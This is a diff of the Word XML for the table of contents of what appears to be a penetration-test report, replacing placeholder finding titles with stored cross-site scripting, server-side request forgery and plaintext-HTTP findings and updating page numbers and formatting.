               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -986,10 +1649,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927396" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299215" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1017,7 +1684,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927396 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299215 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1037,7 +1704,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1055,16 +1722,20 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927397" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299216" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Finding 2 - Brief description in title</w:t>
+              <w:t>Finding 2 - Stored crossing-site scripting vulnerability present in anonymous question functionality</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1085,7 +1756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927397 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299216 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1105,7 +1776,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1123,10 +1794,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927398" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299217" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1154,7 +1829,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927398 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299217 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1174,7 +1849,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1192,10 +1867,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927399" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299218" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1223,7 +1902,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927399 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299218 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1243,7 +1922,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1261,10 +1940,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927400" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299219" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1292,7 +1975,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927400 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299219 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1312,7 +1995,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1330,10 +2013,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927401" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299220" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1361,7 +2048,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927401 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299220 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1381,7 +2068,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1399,10 +2086,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927402" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299221" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1430,7 +2121,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927402 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299221 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1450,7 +2141,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1468,10 +2159,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927403" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299222" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1499,7 +2194,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927403 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299222 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1519,7 +2214,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1537,10 +2232,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927404" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299223" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1568,7 +2267,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927404 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299223 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1588,7 +2287,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1606,16 +2305,20 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927405" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299224" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Finding 3 - Brief description in title</w:t>
+              <w:t>Finding 3 - Server-side request forgery vulnerability present in the website validation functionality</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1636,7 +2339,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927405 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299224 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1656,7 +2359,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1674,10 +2377,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927406" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299225" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1705,7 +2412,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927406 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299225 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1725,7 +2432,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1743,10 +2450,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927407" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299226" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1774,7 +2485,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927407 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299226 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1794,7 +2505,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1812,10 +2523,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927408" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299227" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1843,7 +2558,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927408 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299227 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1863,7 +2578,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1881,10 +2596,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927409" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299228" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1912,7 +2631,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927409 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299228 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1932,7 +2651,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1950,10 +2669,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927410" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299229" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1981,7 +2704,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927410 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299229 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2001,7 +2724,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2019,10 +2742,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927411" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299230" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2050,7 +2777,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927411 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299230 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2070,7 +2797,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2088,10 +2815,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927412" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299231" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2119,7 +2850,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927412 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299231 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2139,7 +2870,1188 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299232" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Finding 4 - Sensitive information transported in plain text via HTTP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299232 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299233" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299233 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299234" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Proof of Concept</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299234 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299235" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Impact</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299235 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71299236" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Likelihood</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299236 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
